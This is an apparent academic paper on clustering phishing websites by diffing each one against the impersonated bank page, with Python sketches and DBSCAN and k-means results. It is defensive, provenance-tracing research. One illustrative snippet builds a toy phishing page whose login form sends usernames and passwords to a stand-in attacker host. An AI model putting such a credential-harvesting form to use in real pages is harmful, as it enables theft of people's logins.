Symposia and Workshops on Ubiquitous, Autonomic and Trusted Computing
Using differencing to increase distinctiveness for phishing website clustering

Robert Layton, Simon Brown, Paul Watters
Internet Commerce Security Laboratory, University of Ballarat, Ballarat, Australia
Email: [email protected], [email protected], [email protected]
Abstract—Phishing webpages are a previously underused resource for determining the provenance of phishing attacks. A phishing webpage aims to impersonate a legitimate website in order to trick potential victims into revealing their confidential data, such as usernames and passwords. Different phishing webpages, however, often contain small differences, and these differences can provide a great deal of evidence about the provenance of phishing attacks. When a webpage is impersonated, there is a large amount of 'redundant' information: much of the original, impersonated website is reproduced in the phishing website, making phishing websites from different attacks very similar to each other. To overcome this issue, a diff can be used, which takes the phishing and original websites as input and returns the differences between the two. These differences present a new, previously unused view of the data and a novel way to increase the ability of clustering algorithms to find good, distinct and well-separated clusters within the data. The research presented here outlines this diff process and shows that, for the data used, comparable results were obtained while the dimensionality of the dataset was reduced. This reduction in size allows clustering algorithms to complete faster, due to the reduced dimensionality of the dataset.
I. INTRODUCTION

Phishing is a form of online fraud that causes direct losses estimated at about US$61 million a year [4] and unknown indirect losses believed to be in the billions [3], due to lost trust between customers and legitimate corporations. Phishing attacks attempt to trick users into revealing confidential information, which can then be used to steal the victim's identity and perform tasks such as online banking, taking out loans or stealing further confidential information. Phishing attacks often contain two major elements: an email and a webpage. The email aims to trick the user into navigating to the webpage, and the webpage then requests the user's personal details, which are later used for profit. Phishing emails have long been a target of research in detection, classification and user education. Phishing webpages, however, have often been neglected, despite the potential amount of information in them. The potential benefits of using phishing webpage data to distinguish provenance in phishing attacks were highlighted in [8]. Despite the gains achieved in that research, it was found to be difficult to achieve good clusterings, due to the free parameters of the clustering algorithms and the difficulty of finding good parameters for the dataset and the intended purpose of the clusterings.

978-0-7695-3737-5/09 $25.00 © 2009 IEEE. DOI 10.1109/UIC-ATC.2009.62

Determining the provenance of a series of crimes (such as phishing) is a key element that helps law enforcement agencies (LEAs) determine how to use their resources to track down and stop those crimes. Bigger phishing attacks present a better way for LEAs to use their resources, as they provide more information to be tracked, as well as a bigger payoff if the phisher is caught. Determining which phishing events belong to these bigger phishing attacks is a difficult task, due to obfuscation techniques such as using botnets to hide the origins of attacks or source code obfuscation to make filtering more difficult. Botnets are particularly difficult to trace, using techniques such as fast flux [5] to make it difficult to monitor where attacks come from and where the stolen credentials go. Despite this, forensic methods used on phishing emails in [9] suggest that just 3 major groups account for 86% of all attacks. If automated systems can be developed that automatically derive the provenance of phishing attacks, LEAs can focus their attention on taking down major phishing operations, drastically reducing the problem of phishing.

Diffing algorithms are designed to take two objects as input and return a list of the differences between the two. One of the first examples was the diff program for Unix systems in the early 1970s [6]. Since then, programs have been developed that create a diff (a list of the differences) for binary files, HTML files and many other file types. By tracking only the changes instead of the complete newer version, diffs often reduce the amount of information needed to store multiple versions of the same set of files, and are a key component in source control systems such as CVS, SVN and git. Diff programs attempt to solve the LCS (longest common subsequence) problem in order to create diff descriptions that are as small as possible.
Diffs for specific types of files, such as binary or HTML files, can use heuristics to determine the LCS more quickly. This article aims to increase the ability of clustering algorithms to find good, distinct clusters by using a diff algorithm to discover the differences between a phishing webpage and the actual webpage that is being impersonated.
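The behaviour of a line-based diff can be sketched with Python's standard difflib module, which solves a longest-matching-subsequence problem in the spirit of [6]. This is an illustrative sketch only, not the tool used in this research; the two HTML strings below are invented examples.

```python
import difflib

original = """<html>
<body>
<h1>Example Bank</h1>
<p>Welcome to online banking.</p>
</body>
</html>"""

phishing = """<html>
<body>
<h1>Example Bank</h1>
<form action="http://evil.example/collect.php">
<input name="username"><input name="password">
</form>
</body>
</html>"""

# unified_diff emits instructions for turning `original` into `phishing`.
for line in difflib.unified_diff(original.splitlines(),
                                 phishing.splitlines(),
                                 lineterm=""):
    print(line)

# In this research the "diff" of interest is only the material the phisher
# added, i.e. lines present in the phishing page but not in the original:
added = [line[2:] for line in difflib.ndiff(original.splitlines(),
                                            phishing.splitlines())
         if line.startswith("+ ")]
print(added)
```

Note that the shared lines (the impersonated content) drop out entirely, leaving only the attacker-specific additions as features for clustering.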
II. PREVIOUS WORK
A. Phishing provenance

Determining the provenance of phishing attacks is a current difficulty for anti-phishing organizations, as phishers employ a variety of means to obfuscate their identities, locations and motives. Profiling presents one of the best avenues for determining provenance, as these attributes of phishers can be determined with adequate profiles. In [2], profiling was described as 'a technique whereby a set of characteristics of a particular class of person is inferred from past experience, and data-holdings are then searched for individuals with a close fit to that set of characteristics'. This definition suggests that by finding traits that are common between phishing attacks, it can be inferred that the origins of those attacks are similar. It was suggested in [9] that there is a 'level of organization in phishing attacks', and it was also found that just 3 groups were responsible for around 86% of all phishing attacks in a particular sample. This suggests that there are viable targets for law enforcement agencies (LEAs) to pursue in their investigations, and that the downfall of just three groups would drastically reduce the number of phishing attacks.

B. Diff

The original diff program is a utility written for Unix systems in the early 1970s, using the methods described in [6]. The diff utility takes two text files as input and produces a third file, which is a set of instructions for changing the first file into the second. This set of changes is called a diff, and the goal of a diff program is often to create a diff file that is as small as possible, although other optimizations, such as using less memory or finishing quickly at the cost of diff file size, are also available. A diff program can be thought of as a compression algorithm, described in [7] as a delta algorithm, which 'compress(es) data by encoding one file in terms of another'. For this reason, diffs are used in version control systems such as CVS, SVN and git. Data backup programs can also use diffs to reduce the size of regular backups, which has cost-saving benefits by reducing the amount of data that needs to be saved in long-term storage. In most diff programs, the diff is a set of instructions required to transform the first document into the second. This set of operations is often called the diff; in this research, however, we use the term diff to mean the source code that is in the first document (the phishing website) but not in the second document (the original website). To the authors' knowledge, this is the first time that diffs have been used to simplify the clustering process for web-based problems such as phishing. This process does not generalize easily, however, and is specifically targeted at impersonation attacks. Phishing websites deliberately attempt to impersonate legitimate websites, and as a result this process is applicable to them. One other field where this methodology could be useful is in determining copyright infringement through content copied to third-party websites.

III. METHODOLOGY

The data used is a collection of 24403 websites collected by a phishing attack tracking program that records changes to the websites hosted at URLs that are known to contain, or to have contained, phishing websites targeted at a major financial institution. The data is dirty, containing both phishing and non-phishing websites; however, it is reasonable to assume that any process set up to track incoming data should be expected to handle dirty data in some form. In this research, the dirty data is considered part of the dataset and is not filtered or altered in any way. The process used by [8] is used in this research to model and cluster the datasets. Firstly, a bag-of-words model is applied to the dataset, which usually results in a dataset with high dimensionality and redundant features. This bag-of-words model is then reduced using Principal Component Analysis (PCA) to find the top n features (linear components of the dataset) that account for over 90% of the variability in the data. This data is then clustered using DBSCAN and an iterative k-means algorithm as described in [8]. The effectiveness of the clustering is then determined using the silhouette coefficient to measure the distinctness of the clusters. The algorithm is presented in algorithm 1.
Algorithm 1 The RAW methodology
1) Apply the bag-of-words model to the source code of the phishing websites.
2) Use PCA to reduce the model to the top n features that account for 90% of the total variance.
3) Cluster the reduced model using a standard clustering algorithm such as k-means.
4) Test the model using the silhouette coefficient.

To test whether using an HTML diff has a positive influence on the clustering process, two different datasets are created from the initial source code of the data. The first follows the steps outlined in algorithm 1 and will be referred to as the RAW methodology. The second dataset is created by adding a step 0 to algorithm 1, in which the source code is diffed against the online banking website of the institution that the phishing attacks are trying to impersonate. This will be referred to as the DIFF methodology; apart from this one difference, the methodologies are the same.

Algorithm 2 The DIFF methodology
0) Run an HTML-aware diff program on the website source code versus the targeted online banking website.
1) Apply the bag-of-words model to the diffs of the phishing websites.
2) Use PCA to reduce the model to the top n features that account for 90% of the total variance.
3) Cluster the reduced model using a standard clustering algorithm such as k-means.
4) Test the model using the silhouette coefficient.
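The RAW pipeline of algorithm 1 can be sketched with scikit-learn. This is an illustrative reconstruction, not the paper's implementation: the toy corpus stands in for phishing website source code, and the fixed k and random seed are invented for the example. The `n_components=0.90` argument mirrors the rule of keeping components that explain 90% of the variance.

```python
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score

# Stand-in corpus: in the paper this would be the HTML source of the
# phishing websites (or, for the DIFF methodology, their diffs).
pages = [
    "login form username password submit bank",
    "login form username password submit bank secure",
    "account verify credit card number expiry",
    "account verify credit card number cvv",
    "welcome home news contact about sitemap",
    "welcome home news contact about links",
]

# 1) Bag-of-words model.
X = CountVectorizer().fit_transform(pages).toarray()

# 2) PCA, keeping the top components that explain 90% of the variance.
X_reduced = PCA(n_components=0.90).fit_transform(X)

# 3) Cluster the reduced model (k-means with a fixed k for illustration).
labels = KMeans(n_clusters=3, n_init=10, random_state=0).fit_predict(X_reduced)

# 4) Evaluate distinctness with the silhouette coefficient
#    (-1 to 1; higher means better-separated clusters).
score = silhouette_score(X_reduced, labels)
print(labels, round(score, 3))
```

The DIFF methodology would insert a diffing step before the vectorizer, feeding the per-page diffs rather than the raw source into `CountVectorizer`.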
The HTML diffing process applied in the DIFF methodology works by finding elements that are common to each tree. Broken tags are not fixed, so that, as expected, two websites that differ only because one has a broken tag that the other does not will still register a difference between the pages. An optimization for speed is used in the diffing process, where higher-level elements, such as <body> or <head>, are checked before smaller tags such as their child elements. This works recursively to find the largest elements in common, which reduces the amount of work required to complete the diff. The final step finds strings that match between the websites and removes those as well. After the common elements are removed, the remaining code is kept (even if it is not valid), and the result is the difference between the original (the source code of the phishing website) and the source code of the online banking website. One problem that could face HTML diffing is the concept of order, where HTML elements that are otherwise equal are reordered to different parts of the source code. It is possible to create the same webpage with reordered source code, which could cause problems in determining what has been changed and what has not. The HTML diffing process used in the DIFF methodology accounts for this, and any results are then modelled using the bag-of-words model, which ignores order anyway, resulting in the same model being found for the same source code reordered.
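The top-down pruning strategy described above can be sketched as follows. This is a simplified reconstruction, not the actual diff program used in the research: it parses each page into a toy tag tree, discards any child whose serialized form exactly matches a subtree of the original (so large matching elements are pruned before their children are examined), and keeps whatever remains. Void elements such as <br> and genuinely broken markup are not handled, and the example pages and URL are invented.

```python
from html.parser import HTMLParser

class Node:
    """A minimal HTML tree node; children are Nodes or text strings."""
    def __init__(self, tag=None, attrs=None):
        self.tag, self.attrs = tag, tuple(attrs or ())
        self.children = []

    def render(self):
        inner = "".join(c if isinstance(c, str) else c.render()
                        for c in self.children)
        if self.tag is None:           # the synthetic root
            return inner
        a = "".join(f' {k}="{v}"' for k, v in self.attrs)
        return f"<{self.tag}{a}>{inner}</{self.tag}>"

class TreeBuilder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.root = Node()
        self.stack = [self.root]
    def handle_starttag(self, tag, attrs):
        node = Node(tag, attrs)
        self.stack[-1].children.append(node)
        self.stack.append(node)
    def handle_endtag(self, tag):
        if len(self.stack) > 1:
            self.stack.pop()
    def handle_data(self, data):
        if data.strip():
            self.stack[-1].children.append(data.strip())

def parse(html):
    builder = TreeBuilder()
    builder.feed(html)
    return builder.root

def html_diff(phish, orig):
    """Return the parts of `phish` not present in `orig`, pruning whole
    matching subtrees before descending into their children."""
    result = []
    orig_rendered = [c if isinstance(c, str) else c.render()
                     for c in orig.children]
    for child in phish.children:
        rendered = child if isinstance(child, str) else child.render()
        if rendered in orig_rendered:
            orig_rendered.remove(rendered)   # exact subtree match: discard
            continue
        if isinstance(child, str):
            result.append(child)
            continue
        # Partial match: recurse into an original child with the same tag.
        partner = next((c for c in orig.children
                        if not isinstance(c, str) and c.tag == child.tag),
                       None)
        if partner is None:
            result.append(child.render())
        else:
            result.extend(html_diff(child, partner))
    return result

orig_page = ('<html><head><title>Example Bank</title></head>'
             '<body><h1>Welcome</h1></body></html>')
phish_page = ('<html><head><title>Example Bank</title></head>'
              '<body><h1>Welcome</h1>'
              '<form action="http://evil.example/collect.php">'
              'Enter your details</form></body></html>')

print(html_diff(parse(phish_page), parse(orig_page)))
```

Everything shared with the impersonated page (the head and the heading) is pruned, leaving only the credential-harvesting form as the phishing page's diff.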
IV. RESULTS

Applying the bag-of-words technique to the raw source code resulted in 663 dimensions, which was reduced to 17 after applying PCA feature selection. The DIFF methodology differs from the RAW methodology only in the inclusion of step '0', where the source code from each website is diffed against the standard online banking website of the bank that was being impersonated by most of the attacks. A smaller set of dimensions was found using the bag-of-words model, just 400 compared to the 663 without the HTML diff. After applying PCA feature selection, 13 dimensions were found to account for over 90% of the variance, again fewer than in the RAW methodology. This is a net reduction of 4 features, or 23.5%, which was evident in the size of the resulting datasets (2092kb compared to 2693kb). Smaller datasets are generally easier to cluster, due to the problems of high dimensionality given in [1]. While the DIFF methodology results in smaller datasets, the results need to be comparable for the process to be worth the extra time required to create the diffs of the files, and this outcome is shown in this section.

TABLE I
Results for DBSCAN using the RAW methodology

              Neighbourhood size
eps      5      15     25     35     45
0.02    0.97   0.89   0.94   0.86   0.94
0.04    0.92   0.93   0.94   0.89   0.88
0.06    0.83   0.81   0.80   0.80   0.80
0.08    0.81   0.80   0.81   0.80   0.80
0.10    0.73   0.72   0.72   0.72   0.74
0.12    0.73   0.72   0.72   0.72   0.72
0.14    0.73   0.72   0.72   0.72   0.72
0.16    0.73   0.72   0.72   0.73   0.72
0.18    0.70   0.71   0.71   0.71   0.70
0.20    0.72   0.72   0.72   0.72   0.72
0.22    0.69   0.68   0.68   0.68   0.69
0.24    0.69   0.68   0.68   0.68   0.68
0.26    0.61   0.61   0.61   0.63   0.62
0.28    0.61   0.62   0.62   0.62   0.62

TABLE II
Results for DBSCAN using the DIFF methodology

              Neighbourhood size
eps      5      15     25     35     45
0.02    0.95   0.88   0.97   0.97   0.86
0.04    0.92   0.90   0.88   0.93   0.94
0.06    0.83   0.81   0.83   0.80   0.82
0.08    0.82   0.81   0.80   0.81   0.80
0.10    0.73   0.73   0.72   0.72   0.74
0.12    0.73   0.73   0.72   0.71   0.71
0.14    0.73   0.72   0.72   0.72   0.72
0.16    0.73   0.73   0.72   0.73   0.73
0.18    0.71   0.71   0.71   0.70   0.70
0.20    0.72   0.72   0.72   0.72   0.72
0.22    0.69   0.68   0.69   0.69   0.69
0.24    0.69   0.69   0.69   0.68   0.68
0.26    0.61   0.62   0.61   0.63   0.59
0.28    0.61   0.61   0.61   0.60   0.62

A. DBSCAN

The websites were then clustered using these features, and the results are given in table I. Smaller values for the eps value and neighbourhood size resulted in more defined clusterings, as can be expected. This is due to the fact that by keeping
the neighbourhood size the same and altering the eps value, a hierarchical clustering model can be made, where clusters at one eps value are subsets of clusters at a larger eps value. The same is true for the neighbourhood size, due to the less restricted environment. Applying the DIFF methodology to the data provided the results shown in table II, which follow the same relative pattern as the RAW methodology: smaller eps and neighbourhood size values result in more defined clusterings, as expected. A comparison table (the values from table I subtracted from the corresponding values in table II) is given in table III. While the DIFF methodology resulted in a higher mean silhouette coefficient overall for the parameters tested, the p-value for the hypothesis that 'the RAW methodology creates the same results as the DIFF methodology' is 0.66, indicating no significant difference. This is despite the reduced number of features in the DIFF methodology, meaning that comparable clusterings were found using less information.

TABLE III
Comparison table: table II minus table I

              Neighbourhood size
eps      5      15     25     35     45
0.02   -0.03  -0.01   0.03   0.11  -0.08
0.04    0.00  -0.04  -0.06   0.05   0.06
0.06    0.00   0.00   0.03  -0.01   0.03
0.08    0.01   0.01   0.00   0.02   0.00
0.10    0.00   0.01   0.00   0.01   0.00
0.12    0.00   0.01   0.01  -0.01  -0.01
0.14    0.00   0.00   0.00  -0.01   0.00
0.16    0.00   0.01   0.00   0.00   0.00
0.18    0.00   0.00  -0.01   0.00   0.00
0.20    0.00   0.00   0.00  -0.01   0.00
0.22   -0.01   0.00   0.01   0.01   0.00
0.24   -0.01   0.01   0.01   0.00   0.00
0.26    0.00   0.01   0.00  -0.01  -0.03
0.28   -0.01  -0.01  -0.01  -0.01   0.00

B. Iterative k-means

The iterative k-means algorithm was run with 30 starting positions per k value, for k values between 2 and 60, for both the RAW and DIFF methodologies. The results are given in tables IV and V, showing good values for both methodologies. Visible in the results is a consistently higher value for the DIFF methodology compared to the RAW methodology when k is 3 or above, and this improvement is significant, with p-values of 0.000 for k values of 4 or above¹. This difference is also visible in figure 1, showing a clear benefit to using the DIFF methodology for this clustering algorithm. By using the DIFF methodology, the clusters are better defined, allowing greater confidence in the model.

Fig. 1. Comparison between the DIFF and RAW methodologies for the iterative k-means algorithm.
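The iterative k-means evaluation (30 restarts per k, mean and variance of the silhouette coefficient per k) can be sketched as follows. This is an illustrative sketch with a synthetic dataset standing in for the PCA-reduced phishing features; the blob centres, seeds and the shortened k range are invented for the example.

```python
import numpy as np
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score

rng = np.random.default_rng(0)
# Synthetic stand-in for the PCA-reduced dataset
# (the paper used 17 features for RAW and 13 for DIFF).
X = np.vstack([rng.normal(loc=c, scale=0.5, size=(40, 13))
               for c in (0.0, 3.0, 6.0, 9.0)])

results = {}
for k in range(2, 8):                  # the paper sweeps k from 2 to 60
    scores = []
    for restart in range(30):          # 30 random starting positions per k
        labels = KMeans(n_clusters=k, n_init=1,
                        random_state=restart).fit_predict(X)
        scores.append(silhouette_score(X, labels))
    results[k] = (np.mean(scores), np.var(scores))

for k, (mean, var) in results.items():
    print(f"k={k:2d}  mean={mean:.3f}  var={var:.3f}")
```

Reporting the mean and variance over restarts, as in tables IV and V, shows how stable each k is against k-means' sensitivity to its starting positions.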
TABLE IV
Iterative k-means results for the RAW methodology, 30 restarts per k value

k    Mean   Var      k    Mean   Var
2    0.415  0.049    31   0.809  0.003
3    0.501  0.020    32   0.830  0.003
4    0.538  0.006    33   0.844  0.002
5    0.562  0.005    34   0.838  0.003
6    0.526  0.009    35   0.865  0.001
7    0.565  0.007    36   0.875  0.001
8    0.555  0.009    37   0.872  0.002
9    0.574  0.008    38   0.883  0.002
10   0.596  0.005    39   0.885  0.001
11   0.584  0.005    40   0.881  0.001
12   0.550  0.006    41   0.896  0.001
13   0.567  0.008    42   0.895  0.001
14   0.575  0.009    43   0.908  0.001
15   0.606  0.007    44   0.923  0.001
16   0.617  0.007    45   0.911  0.001
17   0.614  0.006    46   0.918  0.001
18   0.656  0.002    47   0.915  0.001
19   0.645  0.007    48   0.917  0.001
20   0.660  0.011    49   0.928  0.001
21   0.665  0.004    50   0.931  0.001
22   0.692  0.006    51   0.919  0.001
23   0.697  0.006    52   0.917  0.001
24   0.733  0.006    53   0.931  0.001
25   0.745  0.003    54   0.932  0.001
26   0.746  0.004    55   0.943  0.000
27   0.778  0.005    56   0.943  0.000
28   0.763  0.003    57   0.942  0.000
29   0.810  0.003    58   0.945  0.000
30   0.804  0.002    59   0.946  0.000
                     60   0.950  0.000

¹The p-value is 0.02 for k = 2 and 0.03 for k = 3.

TABLE V
Iterative k-means results for the DIFF methodology, 30 restarts per k value

k    Mean    Var      k    Mean    Var
2    0.3996  0.134    31   0.9251  0.001
3    0.5622  0.005    32   0.9352  0.001
4    0.5826  0.011    33   0.9416  0.001
5    0.6445  0.007    34   0.9437  0.001
6    0.5969  0.011    35   0.9438  0.001
7    0.6455  0.012    36   0.9610  0.000
8    0.6401  0.014    37   0.9461  0.000
9    0.6498  0.013    38   0.9519  0.001
10   0.6930  0.011    39   0.9619  0.001
11   0.6743  0.010    40   0.9522  0.001
12   0.6704  0.011    41   0.9596  0.001
13   0.6838  0.015    42   0.9589  0.001
14   0.6898  0.013    43   0.9633  0.000
15   0.7388  0.008    44   0.9712  0.001
16   0.7312  0.012    45   0.9638  0.001
17   0.7641  0.008    46   0.9700  0.001
18   0.7822  0.007    47   0.9726  0.001
19   0.7771  0.007    48   0.9712  0.001
20   0.8148  0.006    49   0.9782  0.001
21   0.8172  0.004    50   0.9796  0.000
22   0.8330  0.005    51   0.9723  0.001
23   0.8377  0.007    52   0.9771  0.001
24   0.8559  0.005    53   0.9822  0.001
25   0.8781  0.002    54   0.9876  0.000
26   0.8953  0.003    55   0.9881  0.000
27   0.9095  0.002    56   0.9863  0.001
28   0.9194  0.001    57   0.9926  0.000
29   0.9236  0.002    58   0.9907  0.000
30   0.9203  0.001    59   0.9979  0.000
                      60   0.9919  0.000

V. CONCLUSION

Using an HTML diff instead of the original source code has proven to be an effective method of reducing the complexity of the phishing website clustering problem, while maintaining comparable, or even producing better, results than the RAW methodology. There was shown to be little difference between the DIFF methodology and the RAW methodology for DBSCAN, despite a 23.5% reduction in the size of the dataset, from 17 to 13 features. This allows clustering algorithms to run faster, and more complex algorithms to be used, while still finding clusterings of comparable quality. The DBSCAN algorithm reported a non-significant increase in the mean silhouette coefficient, signalling potential benefits in using this methodology. The iterative k-means algorithm reported a significant increase when using the DIFF methodology, indicating that the simpler model used by k-means lends itself better to simpler datasets. Not only were the results better than the RAW methodology, they were also very high, with silhouette coefficient values above 0.9 for k values above 27. This indicates that the model fits the data very well and that this method should be used in place of the RAW methodology in future research into phishing website provenance.

There is an initial trade-off in speed for the HTML diff to take place. Whether this results in a faster overall time between start and finish obviously depends on the choice of clustering algorithm. Despite this, clustering new instances does not require the diff to take place, as the bag-of-words model can be applied to find an appropriate feature vector for a new instance without the diff, since the 'words' will be in the source code regardless. Future work in this area can use this property to speed up the diff process by finding the diff of just a sample of the dataset, and using the resulting bag-of-words model to model the other instances without needing to run the diff process again for the new instances. This could speed up the entire process, recovering much of the speed lost by using the DIFF methodology instead of the RAW methodology.

ACKNOWLEDGMENT

This research was funded by the State Government of Victoria, IBM, Westpac, the Australian Federal Police and the University of Ballarat.

REFERENCES

[1] K. Beyer, J. Goldstein, R. Ramakrishnan, and U. Shaft. When is 'nearest neighbor' meaningful? Lecture Notes in Computer Science, pages 217–235, 1999.
[2] R. Clarke. Profiling: A hidden challenge to the regulation of data surveillance. Journal of Law and Information Science, 4:403, 1993.
[3] Federal Trade Commission. Identity theft survey report. Technical report, www.ftc.gov/os/2007/11/SynovateFinalReportIDTheft2006.pdf, 2007.
[4] C. Herley and D. Florencio. A profitless endeavor: Phishing as tragedy of the commons. New Security Paradigms Workshop, 2008.
[5] T. Holz, C. Gorecki, K. Rieck, and F. Freiling. Measuring and detecting fast-flux service networks. In Proceedings of the Network & Distributed System Security Symposium, 2008.
[6] J. Hunt and M. McIlroy. An Algorithm for Differential File Comparison. Bell Laboratories, 1976.
[7] J. J. Hunt, K.-P. Vo, and W. F. Tichy. Delta algorithms: an empirical analysis. ACM Trans. Softw. Eng. Methodol., 7(2):192–214, 1998.
[8] R. Layton and P. Watters. Determining provenance of phishing websites using automated conceptual analysis. Submitted, 2009.
[9] S. McCombie, P. Watters, A. Ng, and B. Watson. Forensic characteristics of phishing - petty theft or organized crime? In J. Cordeiro, J. Filipe, and S. Hammoudi, editors, WEBIST (1), pages 149–157. INSTICC Press, 2008.